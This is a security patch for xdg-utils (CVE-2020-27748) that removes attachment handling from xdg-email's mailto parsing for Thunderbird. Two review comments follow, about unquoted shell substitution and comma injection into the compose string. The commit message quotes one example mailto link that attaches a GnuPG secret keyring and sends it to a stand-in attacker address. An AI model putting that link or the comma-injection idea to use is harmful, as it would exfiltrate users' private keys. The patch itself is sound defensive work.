1From 1f199813e0eb0246f63b54e9e154970e609575af Mon Sep 17 00:00:00 2001
2From: =?UTF-8?q?J=C3=B6rg=20Thalheim?= <joerg@thalheim.io>
3Date: Tue, 18 Aug 2020 16:52:24 +0100
4Subject: [PATCH] xdg-email: remove attachment handling from mailto
5MIME-Version: 1.0
6Content-Type: text/plain; charset=UTF-8
7Content-Transfer-Encoding: 8bit
8
9This allows attacker to extract secrets from users:
10
11mailto:sid@evil.com?attach=/.gnupg/secring.gpg
12
13See also https://bugzilla.mozilla.org/show_bug.cgi?id=1613425
14and https://gitlab.freedesktop.org/xdg/xdg-utils/-/issues/177
15
16Signed-off-by: Jörg Thalheim <joerg@thalheim.io>
17---
18 scripts/xdg-email.in | 7 +------
19 1 file changed, 1 insertion(+), 6 deletions(-)
20
21Upstream-Status: Backport
22CVE: CVE-2020-27748
23
24diff --git a/scripts/xdg-email.in b/scripts/xdg-email.in
25index 6db58ad..5d2f4f3 100644
26--- a/scripts/xdg-email.in
27+++ b/scripts/xdg-email.in
28@@ -32,7 +32,7 @@ _USAGE
29 
30 run_thunderbird()
31 {
32- local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY ATTACH
33+ local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY
34 THUNDERBIRD="$1"
35 MAILTO=$(echo "$2" | sed 's/^mailto://')
36 echo "$MAILTO" | grep -qs "^?"
37@@ -48,7 +48,6 @@ run_thunderbird()
38 BCC=$(/bin/echo -e $(echo "$MAILTO" | grep '^bcc=' | sed 's/^bcc=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }'))
39 SUBJECT=$(echo "$MAILTO" | grep '^subject=' | tail -n 1)
40 BODY=$(echo "$MAILTO" | grep '^body=' | tail -n 1)
41- ATTACH=$(/bin/echo -e $(echo "$MAILTO" | grep '^attach=' | sed 's/^attach=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }' | sed 's/,$//'))
42
43 if [ -z "$TO" ] ; then
44 NEWMAILTO=
45@@ -68,10 +67,6 @@ run_thunderbird()
46 NEWMAILTO="${NEWMAILTO},$BODY"
47 fi
48
49- if [ -n "$ATTACH" ] ; then
50- NEWMAILTO="${NEWMAILTO},attachment='${ATTACH}'"
51- fi
52-
53 NEWMAILTO=$(echo "$NEWMAILTO" | sed 's/^,//')
54 DEBUG 1 "Running $THUNDERBIRD -compose \"$NEWMAILTO\""
55 "$THUNDERBIRD" -compose "$NEWMAILTO"
56--
57GitLab
58
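Review bot: The BCC line kept by this hunk still feeds the percent-decoded value to `/bin/echo -e` through an unquoted command substitution, so the inner output is word-split and subjected to pathname expansion before the compose string is built; a glob character in the mailto value would be expanded against the current directory. Quoting the substitution, `BCC=$(/bin/echo -e "$(echo "$MAILTO" | grep '^bcc=' | sed 's/^bcc=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }')")`, keeps the decoded text intact (ShellCheck SC2046). The TO and CC lines above this hunk presumably use the same pattern but are outside this view, and run_thunderbird begins and ends outside the hunk.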
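Review bot: With the attachment field removed, the remaining values are still appended into the comma-separated -compose string without any escaping: `NEWMAILTO="${NEWMAILTO},$BODY"` inserts the raw `body=...` text, and the removed `attachment='${ATTACH}'` line shows the fields are delimited by `,` and quoted with `'`. If Thunderbird splits the argument on unescaped commas, a body or subject value containing one could be read as a further field, so dropping the attach key alone may not fully close the class of issue this commit addresses; confirming the -compose grammar and quoting or escaping each value before it is appended would make the fix complete. The earlier TO, CC and SUBJECT appends and the closing `}` of run_thunderbird are outside this hunk.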